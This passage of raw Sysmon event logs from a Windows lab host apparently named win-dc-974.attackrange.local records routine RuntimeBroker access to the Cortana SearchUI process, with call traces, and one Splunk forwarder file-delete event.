Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000001694492Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.629{05ADC7E1-29F2-6039-CB05-00000000AD01}42809192C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694491Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.629{05ADC7E1-29F2-6039-CB05-00000000AD01}42803880C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694490Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.629{05ADC7E1-29F2-6039-CB05-00000000AD01}42803880C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000001694489Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.629{05ADC7E1-29F2-6039-CB05-00000000AD01}42809192C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000001694488Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.629{05ADC7E1-29F2-6039-CB05-00000000AD01}42802000C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694487Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.629{05ADC7E1-29F2-6039-CB05-00000000AD01}42802000C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 23542300x80000000000000001694486Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.613{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3821BB4E0AE5EE3D90AFF1E3C4DEF2F0,SHA256=E299164F8F3C6B66D9388C0E678F5C28165FC3D6205DF5B28EF5AFFF70DA7DC3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001694485Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.567{05ADC7E1-29F2-6039-CB05-00000000AD01}42807288C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001694484Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.567{05ADC7E1-29F2-6039-CB05-00000000AD01}42807288C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694483Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.567{05ADC7E1-29F2-6039-CB05-00000000AD01}42807288C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694482Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.567{05ADC7E1-29F2-6039-CB05-00000000AD01}42807288C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694481Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.567{05ADC7E1-29F2-6039-CB05-00000000AD01}42802000C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a752|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a87f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a26c|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000001694480Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.552{05ADC7E1-29F2-6039-CB05-00000000AD01}42803880C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694479Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.552{05ADC7E1-29F2-6039-CB05-00000000AD01}42803880C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000001694478Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.552{05ADC7E1-29F2-6039-CB05-00000000AD01}42802000C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694477Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.552{05ADC7E1-29F2-6039-CB05-00000000AD01}42809192C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694476Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.552{05ADC7E1-29F2-6039-CB05-00000000AD01}42802000C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000001694475Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.552{05ADC7E1-29F2-6039-CB05-00000000AD01}42809192C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000001694474Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.552{05ADC7E1-29F2-6039-CB05-00000000AD01}42803880C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694473Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.552{05ADC7E1-29F2-6039-CB05-00000000AD01}42803880C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\